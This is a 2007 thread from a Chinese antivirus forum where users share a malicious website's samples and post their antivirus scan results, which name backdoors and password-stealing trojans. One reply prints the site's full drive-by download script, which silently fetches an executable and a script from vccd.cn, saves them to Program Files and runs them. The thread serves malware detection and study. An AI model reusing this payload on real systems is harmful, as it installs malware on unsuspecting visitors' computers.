楼主: turkey2k6
收起左侧

[病毒样本] 发个毒网地址

[复制链接]
yzt1004
发表于 2007-2-8 16:41:21 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\snowwolf\桌面\复件 virus23'
C:\Documents and Settings\snowwolf\桌面\复件 virus23\gezi2\gezi2.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\gezi.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\js.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\qq.exe
      [DETECTION] Is the Trojan horse TR/PSW.Hangame.DW
      [INFO]      The file was deleted!
C:\Documents and Settings\snowwolf\桌面\复件 virus23\rising330\rising330.exe
      [DETECTION] Contains suspicious code HEUR/Malware
      [INFO]      The file was moved to '463de1e2.qua'!
---------------------------------------------------------
AVG Anti-Spyware - 扫描报告
---------------------------------------------------------

+ 创建时间:        16:38:54 2007-2-8

+ 扫描结果:       



C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\qq.exe -> Trojan.Hangame.dw : 已清除.
C:\Documents and Settings\snowwolf\桌面\复件 virus23\muma\js.exe -> Trojan.QQRob.hc : 已清除.


::报告结束
剩余文件已上报AVG
鼻耳盖子
发表于 2007-2-8 17:35:45 | 显示全部楼层

我的微点拦了

我的IE没有打补丁
C:\WINNT\SYSTEM32\DRIVERS\SVCHOST.EXE C:\WINNT\RISING798.EXE
C:\WINNT\RISING798.EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5C:\PROGRAM FILES\BOOS.EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\SHYBSLYJ\DOWN[1].EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE

[ 本帖最后由 鼻耳盖子 于 2007-2-8 17:38 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
turkey2k6
 楼主| 发表于 2007-2-8 17:56:11 | 显示全部楼层
我kao,还有这么多啊,我都没发现,

找出来上传。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
turkey2k6
 楼主| 发表于 2007-2-8 18:00:25 | 显示全部楼层
那个down[1].exe找不到了,谁补上?
龙井茶
发表于 2007-2-9 10:41:43 | 显示全部楼层
下了五个包,第一个卡巴能发现三个,不能删,BOOR这包里发现两个,能杀,其余的不报,AVG一个都不报。
1p1
发表于 2007-2-9 11:05:22 | 显示全部楼层
<SCRIPT>var Words="<script>var url,path
url1="http://vccd.cn/down.exe"
url2="http://vccd.cn/rav.js"
try{var ado=(document.createElement("object"))
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
var xml=ado.CreateObject("Microsoft.XMLHTTP","")
var ab="Adodb.";var cd="Stream";var as=ado.createobject(ab+cd,"")
xml.Open("GET",url1,0);xml.Send();as.type=1;as.open()
as.write(xml.responseBody)
as.savetofile("C:\\Program Files\\boos.exe",2)
as.close();}catch(e){}
var url,path
try{var ado=(document.createElement("object"))
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
xml.Open("GET",url2,0);xml.Send();as.open()
as.write(xml.responseBody)
as.savetofile("C:\\Program Files\\rav.js",2);as.close()
var shell=ado.createobject("Shell.Application","")
shell.ShellExecute("C:\\Program Files\\rav.js","","","open",0)
}catch(e){}</script>
";document.write(unescape(Words))</SCRIPT>
<script language="javascript" src="http://count30.51yes.com/click.aspx?id=308437152&logo=6"></script>
<script src='http://s102.cnzz.com/stat.php?id=387088&web_id=387088' language='JavaScript' charset='gb2312'></script>
turkey2k6
 楼主| 发表于 2007-2-9 13:12:50 | 显示全部楼层
看来boose.exe就是down.exe
mofunzone
发表于 2007-2-9 13:22:38 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\muma'
C:\Documents and Settings\Administrator\My Documents\muma\
  gezi.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
  js.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [INFO]      The file was deleted!
  qq.exe
      [DETECTION] Is the Trojan horse TR/PSW.Hangame.DW
      [INFO]      The file was deleted!
  wl.exe

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\rising330.rar'
C:\Documents and Settings\Administrator\My Documents\
  rising330.rar
    [0] Archive type: RAR
    --> rising330.exe
        [DETECTION] Is the Trojan horse TR/Hijack.Explor.2034
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
wl.exe运行后无反应,已经上报
uploaded files.


A listing of files contained inside archives alongside their results can be found below:File ID         Filename         Size (Byte)        Result
204170         wl.exe         43.161         UNDER ANALYSIS



Please find a detailed report concerning each individual sample below: Filename        Result
wl.exe         UNDER ANALYSIS


The file 'wl.exe' has been determined to be 'UNDER ANALYSIS'.

Please note that you will receive an email which will contain the results shown above. In case the final outcome of the analysis is not yet finished for all files the notification will be sent once ready.
sddy_zkq
发表于 2007-2-9 14:04:26 | 显示全部楼层
我以为我家这个网开不开呢。。好慢。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ffjjyy
发表于 2007-2-9 17:09:08 | 显示全部楼层
没有反应阿
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-27 11:14 , Processed in 0.102056 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表